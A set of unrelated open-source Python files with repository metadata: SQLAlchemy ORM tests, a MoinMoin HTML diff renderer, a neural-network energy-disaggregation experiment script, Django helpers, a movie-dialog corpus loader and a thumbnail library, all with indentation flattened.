Address(id=1, user=User(id=7, concat=14, count=1)),
Address(id=2, user=User(id=8, concat=16, count=3)),
Address(id=3, user=User(id=8, concat=16, count=3)),
Address(id=4, user=User(id=8, concat=16, count=3)),
Address(id=5, user=User(id=9, concat=18, count=1))
]
eq_(sess.query(Address).all(), address_result)
# run the eager version twice to test caching of aliased clauses
for x in range(2):
sess.expunge_all()
def go():
eq_(sess.query(Address).\
options(joinedload('user')).\
order_by(Address.id).all(),
address_result)
self.assert_sql_count(testing.db, go, 1)
ualias = aliased(User)
eq_(
sess.query(Address, ualias).join(ualias, 'user').all(),
[(address, address.user) for address in address_result]
)
eq_(
sess.query(Address, ualias.count).\
join(ualias, 'user').\
join('user', aliased=True).\
order_by(Address.id).all(),
[
(Address(id=1), 1),
(Address(id=2), 3),
(Address(id=3), 3),
(Address(id=4), 3),
(Address(id=5), 1)
]
)
eq_(sess.query(Address, ualias.concat, ualias.count).
join(ualias, 'user').
join('user', aliased=True).order_by(Address.id).all(),
[
(Address(id=1), 14, 1),
(Address(id=2), 16, 3),
(Address(id=3), 16, 3),
(Address(id=4), 16, 3),
(Address(id=5), 18, 1)
]
)
ua = aliased(User)
eq_(sess.query(Address, ua.concat, ua.count).
select_entity_from(join(Address, ua, 'user')).
options(joinedload(Address.user)).order_by(Address.id).all(),
[
(Address(id=1, user=User(id=7, concat=14, count=1)), 14, 1),
(Address(id=2, user=User(id=8, concat=16, count=3)), 16, 3),
(Address(id=3, user=User(id=8, concat=16, count=3)), 16, 3),
(Address(id=4, user=User(id=8, concat=16, count=3)), 16, 3),
(Address(id=5, user=User(id=9, concat=18, count=1)), 18, 1)
]
)
eq_(list(sess.query(Address).join('user').values(Address.id, User.id, User.concat, User.count)),
[(1, 7, 14, 1), (2, 8, 16, 3), (3, 8, 16, 3), (4, 8, 16, 3), (5, 9, 18, 1)]
)
eq_(list(sess.query(Address, ua).select_entity_from(join(Address,ua, 'user')).values(Address.id, ua.id, ua.concat, ua.count)),
[(1, 7, 14, 1), (2, 8, 16, 3), (3, 8, 16, 3), (4, 8, 16, 3), (5, 9, 18, 1)]
)
def test_external_columns_joinedload(self):
users, orders, User, Address, Order, addresses = (self.tables.users,
self.tables.orders,
self.classes.User,
self.classes.Address,
self.classes.Order,
self.tables.addresses)
# in this test, we have a subquery on User that accesses "addresses", underneath
# an joinedload for "addresses". So the "addresses" alias adapter needs to *not* hit
# the "addresses" table within the "user" subquery, but "user" still needs to be adapted.
# therefore the long standing practice of eager adapters being "chained" has been removed
# since its unnecessary and breaks this exact condition.
mapper(User, users, properties={
'addresses':relationship(Address, backref='user', order_by=addresses.c.id),
'concat': column_property((users.c.id * 2)),
'count': column_property(select([func.count(addresses.c.id)], users.c.id==addresses.c.user_id).correlate(users))
})
mapper(Address, addresses)
mapper(Order, orders, properties={
'address':relationship(Address), # m2o
})
sess = create_session()
def go():
o1 = sess.query(Order).options(joinedload_all('address.user')).get(1)
eq_(o1.address.user.count, 1)
self.assert_sql_count(testing.db, go, 1)
sess = create_session()
def go():
o1 = sess.query(Order).options(joinedload_all('address.user')).first()
eq_(o1.address.user.count, 1)
self.assert_sql_count(testing.db, go, 1)
def test_external_columns_compound(self):
# see [ticket:2167] for background
users, Address, addresses, User = (self.tables.users,
self.classes.Address,
self.tables.addresses,
self.classes.User)
mapper(User, users, properties={
'fullname':column_property(users.c.name.label('x'))
})
mapper(Address, addresses, properties={
'username':column_property(
select([User.fullname]).\
where(User.id==addresses.c.user_id).label('y'))
})
sess = create_session()
a1 = sess.query(Address).first()
eq_(a1.username, "jack")
sess = create_session()
a1 = sess.query(Address).from_self().first()
eq_(a1.username, "jack")
class TestOverlyEagerEquivalentCols(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
base = Table('base', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('data', String(50))
)
sub1 = Table('sub1', metadata,
Column('id', Integer, ForeignKey('base.id'), primary_key=True),
Column('data', String(50))
)
sub2 = Table('sub2', metadata,
Column('id', Integer, ForeignKey('base.id'), ForeignKey('sub1.id'), primary_key=True),
Column('data', String(50))
)
def test_equivs(self):
base, sub2, sub1 = (self.tables.base,
self.tables.sub2,
self.tables.sub1)
class Base(fixtures.ComparableEntity):
pass
class Sub1(fixtures.ComparableEntity):
pass
class Sub2(fixtures.ComparableEntity):
pass
mapper(Base, base, properties={
'sub1':relationship(Sub1),
'sub2':relationship(Sub2)
})
mapper(Sub1, sub1)
mapper(Sub2, sub2)
sess = create_session()
s11 = Sub1(data='s11')
s12 = Sub1(data='s12')
s2 = Sub2(data='s2')
b1 = Base(data='b1', sub1=[s11], sub2=[])
b2 = Base(data='b1', sub1=[s12], sub2=[])
sess.add(b1)
sess.add(b2)
sess.flush()
# theres an overlapping ForeignKey here, so not much option except
# to artifically control the flush order
b2.sub2 = [s2]
sess.flush()
q = sess.query(Base).outerjoin('sub2', aliased=True)
assert sub1.c.id not in q._filter_aliases.equivalents
eq_(
sess.query(Base).join('sub1').outerjoin('sub2', aliased=True).\
filter(Sub1.id==1).one(),
b1
)
class LabelCollideTest(fixtures.MappedTest):
"""Test handling for a label collision. This collision
is handled by core, see ticket:2702 as well as
test/sql/test_selectable->WithLabelsTest. here we want
to make sure the end result is as we expect.
"""
@classmethod
def define_tables(cls, metadata):
Table('foo', metadata,
Column('id', Integer, primary_key=True),
Column('bar_id', Integer)
)
Table('foo_bar', metadata,
Column('id', Integer, primary_key=True),
)
@classmethod
def setup_classes(cls):
class Foo(cls.Basic):
pass
class Bar(cls.Basic):
pass
@classmethod
def setup_mappers(cls):
mapper(cls.classes.Foo, cls.tables.foo)
mapper(cls.classes.Bar, cls.tables.foo_bar)
@classmethod
def insert_data(cls):
s = Session()
s.add_all([
cls.classes.Foo(id=1, bar_id=2),
cls.classes.Bar(id=3)
])
s.commit()
def test_overlap_plain(self):
s = Session()
row = s.query(self.classes.Foo, self.classes.Bar).all()[0]
def go():
eq_(row.Foo.id, 1)
eq_(row.Foo.bar_id, 2)
eq_(row.Bar.id, 3)
# all three columns are loaded independently without
# overlap, no additional SQL to load all attributes
self.assert_sql_count(testing.db, go, 0)
def test_overlap_subquery(self):
s = Session()
row = s.query(self.classes.Foo, self.classes.Bar).from_self().all()[0]
def go():
eq_(row.Foo.id, 1)
eq_(row.Foo.bar_id, 2)
eq_(row.Bar.id, 3)
# all three columns are loaded independently without
# overlap, no additional SQL to load all attributes
self.assert_sql_count(testing.db, go, 0)
|
alex/sqlalchemy
|
test/orm/test_froms.py
|
Python
|
mit
| 95,771
|
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - Side by side diffs
@copyright: 2002 Juergen Hermann <jh@web.de>,
2002 Scott Moonen <smoonen@andstuff.org>
@license: GNU GPL, see COPYING for details.
"""
from MoinMoin.support import difflib
from MoinMoin.wikiutil import escape
def indent(line):
eol = ''
while line and line[0] == '\n':
eol += '\n'
line = line[1:]
stripped = line.lstrip()
if len(line) - len(stripped):
line = " " * (len(line) - len(stripped)) + stripped
#return "%d / %d / %s" % (len(line), len(stripped), line)
return eol + line
# This code originally by Scott Moonen, used with permission.
def diff(request, old, new, old_top='', new_top='', old_bottom='', new_bottom='', old_top_class='', new_top_class='', old_bottom_class='', new_bottom_class=''):
""" Find changes between old and new and return
HTML markup visualising them.
@param old: old text [unicode]
@param new: new text [unicode]
@param old_top: Custom html for adding ontop of old revision column (optional)
@param old_bottom: Custom html for adding at bottom of old revision column (optional)
@param new_top: Custom html for adding ontop of new revision column (optional)
@param new_bottom: Custom html for adding at bottom of new revision column (optional)
@param old_top_class: Custom class for <td> with old_top content (optional)
@param new_top_class: Custom class for <td> with new_top content (optional)
@param old_bottom_class: Custom class for <td> with old_bottom content (optional)
@param new_bottom_class: Custom class for <td> with new_bottom content (optional)
"""
_ = request.getText
t_line = _("Line") + " %d"
seq1 = old.splitlines()
seq2 = new.splitlines()
seqobj = difflib.SequenceMatcher(None, seq1, seq2)
linematch = seqobj.get_matching_blocks()
result = """
<table class="diff">
"""
if old_top or new_top:
result += '<tr><td class="%s">%s</td><td class="%s">%s</td></tr>' % (old_top_class, old_top, new_top_class, new_top)
if len(seq1) == len(seq2) and linematch[0] == (0, 0, len(seq1)):
# No differences.
result += '<tr><td class="diff-same" colspan="2">' + _("No differences found!") + '</td></tr>'
else:
result += """
<tr>
<td class="diff-removed"><span>%s</span></td>
<td class="diff-added"><span>%s</span></td>
</tr>
""" % (_('Deletions are marked like this.'), _('Additions are marked like this.'), )
lastmatch = (0, 0)
# Print all differences
for match in linematch:
# Starts of pages identical?
if lastmatch == match[0:2]:
lastmatch = (match[0] + match[2], match[1] + match[2])
continue
llineno, rlineno = lastmatch[0]+1, lastmatch[1]+1
result += """
<tr class="diff-title">
<td>%s:</td>
<td>%s:</td>
</tr>
""" % (request.formatter.line_anchorlink(1, llineno) + request.formatter.text(t_line % llineno) + request.formatter.line_anchorlink(0),
request.formatter.line_anchorlink(1, rlineno) + request.formatter.text(t_line % rlineno) + request.formatter.line_anchorlink(0))
leftpane = ''
rightpane = ''
linecount = max(match[0] - lastmatch[0], match[1] - lastmatch[1])
for line in range(linecount):
if line < match[0] - lastmatch[0]:
if line > 0:
leftpane += '\n'
leftpane += seq1[lastmatch[0] + line]
if line < match[1] - lastmatch[1]:
if line > 0:
rightpane += '\n'
rightpane += seq2[lastmatch[1] + line]
charobj = difflib.SequenceMatcher(None, leftpane, rightpane)
charmatch = charobj.get_matching_blocks()
if charobj.ratio() < 0.5:
# Insufficient similarity.
if leftpane:
leftresult = """<span>%s</span>""" % indent(escape(leftpane))
else:
leftresult = ''
if rightpane:
rightresult = """<span>%s</span>""" % indent(escape(rightpane))
else:
rightresult = ''
else:
# Some similarities; markup changes.
charlast = (0, 0)
leftresult = ''
rightresult = ''
for thismatch in charmatch:
if thismatch[0] - charlast[0] != 0:
leftresult += """<span>%s</span>""" % indent(
escape(leftpane[charlast[0]:thismatch[0]]))
if thismatch[1] - charlast[1] != 0:
rightresult += """<span>%s</span>""" % indent(
escape(rightpane[charlast[1]:thismatch[1]]))
leftresult += escape(leftpane[thismatch[0]:thismatch[0] + thismatch[2]])
rightresult += escape(rightpane[thismatch[1]:thismatch[1] + thismatch[2]])
charlast = (thismatch[0] + thismatch[2], thismatch[1] + thismatch[2])
leftpane = '<br>'.join([indent(x) for x in leftresult.splitlines()])
rightpane = '<br>'.join([indent(x) for x in rightresult.splitlines()])
# removed width="50%%"
result += """
<tr>
<td class="diff-removed">%s</td>
<td class="diff-added">%s</td>
</tr>
""" % (leftpane, rightpane)
lastmatch = (match[0] + match[2], match[1] + match[2])
if old_bottom or new_bottom:
result += '<tr><td class="%s">%s</td><td class="%s">%s</td></tr>' % (old_top_class, old_top, new_top_class, new_top)
result += '</table>\n'
return result
|
Glottotopia/aagd
|
moin/local/moin/build/lib.linux-x86_64-2.6/MoinMoin/util/diff_html.py
|
Python
|
mit
| 5,991
|
import platform
def is_windows():
"""Returns true if current platform is windows"""
return any(platform.win32_ver())
|
huvermann/MyPiHomeAutomation
|
HomeAutomation/thingUtils.py
|
Python
|
mit
| 125
|
from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource,
BLSTMLayer, DimshuffleLayer,
BidirectionalRecurrentLayer)
from neuralnilm.source import standardise, discretize, fdiff, power_and_fdiff
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import MixtureDensityLayer
from neuralnilm.objectives import (scaled_cost, mdn_nll,
scaled_cost_ignore_inactive, ignore_inactive,
scaled_cost3)
from neuralnilm.plot import MDNPlotter, CentralOutputPlotter
from lasagne.nonlinearities import sigmoid, rectify, tanh
from lasagne.objectives import mse, binary_crossentropy
from lasagne.init import Uniform, Normal
from lasagne.layers import (LSTMLayer, DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer, RecurrentLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
#PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
PATH = "/data/dk3810/figures"
SAVE_PLOT_INTERVAL = 500
GRADIENT_STEPS = 10
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
'hair straighteners',
'television'
# 'dish washer',
# ['washer dryer', 'washing machine']
],
on_power_thresholds=[5] * 5,
min_on_durations=[60, 60, 60, 1800, 1800],
min_off_durations=[12, 12, 12, 1800, 600],
window=("2013-06-01", "2014-07-01"),
seq_length=1024,
# random_window=64,
output_one_appliance=False,
boolean_targets=False,
train_buildings=[1],
validation_buildings=[1],
# skip_probability=0.8,
one_target_per_seq=False,
n_seq_per_batch=16,
subsample_target=4,
include_diff=False,
include_power=True,
# clip_appliance_power=True,
target_is_prediction=False,
# independently_center_inputs = True,
standardise_input=True,
unit_variance_targets=True,
input_padding=2,
lag=0
# classification=True
# reshape_target_to_2D=True
# input_stats={'mean': np.array([ 0.05526326], dtype=np.float32),
# 'std': np.array([ 0.12636775], dtype=np.float32)},
# target_stats={
# 'mean': np.array([ 0.04066789, 0.01881946,
# 0.24639061, 0.17608672, 0.10273963],
# dtype=np.float32),
# 'std': np.array([ 0.11449792, 0.07338708,
# 0.26608968, 0.33463112, 0.21250485],
# dtype=np.float32)}
)
N = 50
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
# loss_function=partial(ignore_inactive, loss_func=mdn_nll, seq_length=SEQ_LENGTH),
# loss_function=lambda x, t: mdn_nll(x, t).mean(),
loss_function=lambda x, t: mse(x, t).mean(),
# loss_function=lambda x, t: binary_crossentropy(x, t).mean(),
# loss_function=partial(scaled_cost, loss_func=mse),
# loss_function=ignore_inactive,
# loss_function=partial(scaled_cost3, ignore_inactive=False),
updates_func=momentum,
learning_rate=1e-1,
learning_rate_changes_by_iteration={
1000: 1e-2,
# 400: 1e-3,
# 800: 1e-4
# 500: 1e-3
# 4000: 1e-03,
# 6000: 5e-06,
# 7000: 1e-06
# 2000: 5e-06
# 3000: 1e-05
# 7000: 5e-06,
# 10000: 1e-06,
# 15000: 5e-07,
# 50000: 1e-07
},
do_save_activations=True
# auto_reshape=False,
# plotter=CentralOutputPlotter
# plotter=MDNPlotter
)
def exp_a(name):
global source
source_dict_copy = deepcopy(source_dict)
source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
output_shape = source.output_shape_after_processing()
net_dict_copy['layers_config'] = [
{
'type': BLSTMLayer,
'num_units': 40,
'gradient_steps': GRADIENT_STEPS,
'peepholes': False
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': Conv1DLayer,
'num_filters': 20,
'filter_length': 4,
'stride': 4,
'nonlinearity': sigmoid
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': BLSTMLayer,
'num_units': 80,
'gradient_steps': GRADIENT_STEPS,
'peepholes': False
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'nonlinearity': T.nnet.softplus
}
]
net = Net(**net_dict_copy)
return net
def main():
# EXPERIMENTS = list('abcdefghijklmnopqrstuvwxyz')
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=100000)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
# raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
|
mmottahedi/neuralnilm_prototype
|
scripts/e362.py
|
Python
|
mit
| 5,901
|
from django import template
from django.template.defaultfilters import stringfilter
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from usermgmt import utils
register = template.Library()
@register.filter(is_safe=True)
@stringfilter
def render_attributes(value, autoescape=True):
"""A filter for changing a list of user attributes into a list of links,
data, etc.
"""
# TODO
# @makyo 2016-11-06 #63
if value == '':
return 'No attributes'
to_return = '<dl>'
for attribute in value.split('\n'):
k, v = attribute.split('=', 1)
if k in utils.ATTRIBUTES:
to_return += '<dt>{}</dt>'.format(utils.ATTRIBUTES[k]['dt'])
to_return += '<dd>{}</dd>'.format(
utils.ATTRIBUTES[k]['dd'].format(value=conditional_escape(v)))
to_return += '</dl>'
return mark_safe(to_return)
|
makyo/honeycomb
|
usermgmt/templatetags/profile_extras.py
|
Python
|
mit
| 914
|
import os
import ast
"""
Load the cornell movie dialog corpus.
Available from here:
http://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html
"""
class CornellData:
"""
"""
def __init__(self, dirName):
"""
Args:
dirName (string): directory where to load the corpus
"""
self.lines = {}
self.conversations = []
MOVIE_LINES_FIELDS = ["lineID","characterID","movieID","character","text"]
MOVIE_CONVERSATIONS_FIELDS = ["character1ID","character2ID","movieID","utteranceIDs"]
dirName = "/usr/share/dragonfire/deepconv/"
self.lines = self.loadLines(os.path.join(dirName, "movie_lines.txt"), MOVIE_LINES_FIELDS)
self.conversations = self.loadConversations(os.path.join(dirName, "movie_conversations.txt"), MOVIE_CONVERSATIONS_FIELDS)
# TODO: Cleaner program (merge copy-paste) !!
def loadLines(self, fileName, fields):
"""
Args:
fileName (str): file to load
field (set<str>): fields to extract
Return:
dict<dict<str>>: the extracted fields for each line
"""
lines = {}
with open(fileName, 'r', encoding='iso-8859-1') as f: # TODO: Solve Iso encoding pb !
for line in f:
values = line.split(" +++$+++ ")
# Extract fields
lineObj = {}
for i, field in enumerate(fields):
lineObj[field] = values[i]
lines[lineObj['lineID']] = lineObj
return lines
def loadConversations(self, fileName, fields):
"""
Args:
fileName (str): file to load
field (set<str>): fields to extract
Return:
dict<dict<str>>: the extracted fields for each line
"""
conversations = []
with open(fileName, 'r', encoding='iso-8859-1') as f: # TODO: Solve Iso encoding pb !
for line in f:
values = line.split(" +++$+++ ")
# Extract fields
convObj = {}
for i, field in enumerate(fields):
convObj[field] = values[i]
# Convert string to list (convObj["utteranceIDs"] == "['L598485', 'L598486', ...]")
lineIds = ast.literal_eval(convObj["utteranceIDs"])
# Reassemble lines
convObj["lines"] = []
for lineId in lineIds:
convObj["lines"].append(self.lines[lineId])
conversations.append(convObj)
return conversations
def getConversations(self):
return self.conversations
|
mertyildiran/Dragonfire
|
dragonfire/deepconv/corpus/cornelldata.py
|
Python
|
mit
| 2,691
|
# -*- coding: utf-8 -*-
from thumbnails.conf import settings
from thumbnails.engines import DummyEngine
from thumbnails.helpers import get_engine, generate_filename, get_cache_backend
from thumbnails.images import SourceFile, Thumbnail
__version__ = '0.5.1'
def get_thumbnail(original, size, **options):
"""
Creates or gets an already created thumbnail for the given image with the given size and
options.
:param original: File-path, url or base64-encoded string of the image that you want an
thumbnail.
:param size: String with the wanted thumbnail size. On the form: ``200x200``, ``200`` or
``x200``.
:param crop: Crop settings, should be ``center``, ``top``, ``right``, ``bottom``, ``left``.
:param force: If set to ``True`` the thumbnail will be created even if it exists before.
:param quality: Overrides ``THUMBNAIL_QUALITY``, will set the quality used by the backend while
saving the thumbnail.
:param scale_up: Overrides ``THUMBNAIL_SCALE_UP``, if set to ``True`` the image will be scaled
up if necessary.
:param colormode: Overrides ``THUMBNAIL_COLORMODE``, The default colormode for thumbnails.
Supports all values supported by pillow. In other engines there is a best
effort translation from pillow modes to the modes supported by the current
engine.
:param format: Overrides the format the thumbnail will be saved in. This will override both the
detected file type as well as the one specified in ``THUMBNAIL_FALLBACK_FORMAT``.
:return: A Thumbnail object
"""
engine = get_engine()
cache = get_cache_backend()
original = SourceFile(original)
crop = options.get('crop', None)
options = engine.evaluate_options(options)
thumbnail_name = generate_filename(original, size, crop)
if settings.THUMBNAIL_DUMMY:
engine = DummyEngine()
return engine.get_thumbnail(thumbnail_name, engine.parse_size(size), crop, options)
cached = cache.get(thumbnail_name)
force = options is not None and 'force' in options and options['force']
if not force and cached:
return cached
thumbnail = Thumbnail(thumbnail_name, engine.get_format(original, options))
if force or not thumbnail.exists:
size = engine.parse_size(size)
thumbnail.image = engine.get_thumbnail(original, size, crop, options)
thumbnail.save(options)
for resolution in settings.THUMBNAIL_ALTERNATIVE_RESOLUTIONS:
resolution_size = engine.calculate_alternative_resolution_size(resolution, size)
image = engine.get_thumbnail(original, resolution_size, crop, options)
thumbnail.save_alternative_resolution(resolution, image, options)
cache.set(thumbnail)
return thumbnail
|
relekang/python-thumbnails
|
thumbnails/__init__.py
|
Python
|
mit
| 2,899
|
"""
WSGI config for mords_backend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mords_backend.settings")
application = get_wsgi_application()
|
TeppieC/M-ords
|
mords_backend/mords_backend/wsgi.py
|
Python
|
mit
| 404
|